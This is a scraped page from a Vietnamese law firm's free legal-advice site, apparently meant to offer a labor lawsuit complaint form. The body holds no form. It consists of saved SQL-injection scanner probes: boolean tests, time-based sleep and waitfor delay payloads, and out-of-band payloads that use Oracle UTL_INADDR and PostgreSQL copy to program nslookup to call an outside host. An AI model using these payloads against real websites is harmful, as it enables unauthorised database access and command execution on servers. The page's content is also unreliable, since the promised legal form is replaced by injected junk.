Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu đơn khởi kiện lao động

Cập nhật lần cuối lúc 15:52 ngày 30/05/2014

1
1
1
1'"
1
\
-1 OR 2+472-472-1=0+0+0+1 --
1
-1 OR 3+472-472-1=0+0+0+1 --
@@lLKSq
-1 OR 3*2<(0+5+472-472) --
JyI=
-1 OR 3*2>(0+5+472-472) --
-1 OR 2+25-25-1=0+0+0+1
-1 OR 3+25-25-1=0+0+0+1
-1 OR 3*2<(0+5+25-25)
-1 OR 3*2>(0+5+25-25)
-1' OR 2+447-447-1=0+0+0+1 --
-1' OR 3+447-447-1=0+0+0+1 --
-1' OR 3*2<(0+5+447-447) --
-1' OR 3*2>(0+5+447-447) --
-1' OR 2+456-456-1=0+0+0+1 or 'R2JiDqrx'='
-1' OR 3+456-456-1=0+0+0+1 or 'R2JiDqrx'='
-1' OR 3*2<(0+5+456-456) or 'R2JiDqrx'='
-1' OR 3*2>(0+5+456-456) or 'R2JiDqrx'='
-1" OR 2+912-912-1=0+0+0+1 --
-1" OR 3+912-912-1=0+0+0+1 --
-1" OR 3*2<(0+5+912-912) --
-1" OR 3*2>(0+5+912-912) --
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
-1; waitfor delay '0:0:9' --
-1); waitfor delay '0:0:3' --
1 waitfor delay '0:0:3' --
1 waitfor delay '0:0:9' --
8eRl6VVh'; waitfor delay '0:0:6' --
-1;select pg_sleep(6); --
-1);select pg_sleep(9); --
-1));select pg_sleep(9); --
dgT5WYAN';select pg_sleep(9); --
KldcralS');select pg_sleep(3); --
TDKhM7KB'));select pg_sleep(3); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5293.34060.d8660.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5294.34060.d8660.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5299.34060.d8660.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5300.34060.d8660.\1.bxss.me
963'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: